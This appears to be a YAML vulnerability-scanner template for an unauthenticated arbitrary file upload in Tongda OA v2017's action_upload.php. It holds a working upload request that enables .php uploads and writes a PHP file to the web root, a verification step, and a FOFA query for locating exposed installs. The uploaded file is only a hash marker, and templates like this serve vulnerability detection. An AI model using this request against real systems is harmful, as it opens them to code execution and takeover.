product: 通达OA
vName: 通达OA v2017 action_upload.php 任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 通达OA v2017 action_upload.php 文件过滤不足且无需后台权限，导致任意文件上传漏洞
version: 通达OA v2017
note: ''
search:
  FOFA: app="TDXK-通达OA"
protocol: http
link: https://peiqi.wgpsec.org/wiki/oa/通达OA/通达OA v2017 action_upload.php 任意文件上传漏洞.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /module/ueditor/php/action_upload.php?response=uploadfile
      file:
        ffff:
          - 52e039302a62d077.php
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/octet-stream
      dataJson:
        CONFIG[fileAllowFiles][]: .php
        CONFIG[fileFieldName]: ffff
        CONFIG[fileMaxSize]: '1000000000'
        CONFIG[filePathFormat]: 52e039302a62d077
        mufile: submit
    verify:
      path: /52e039302a62d077.php
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and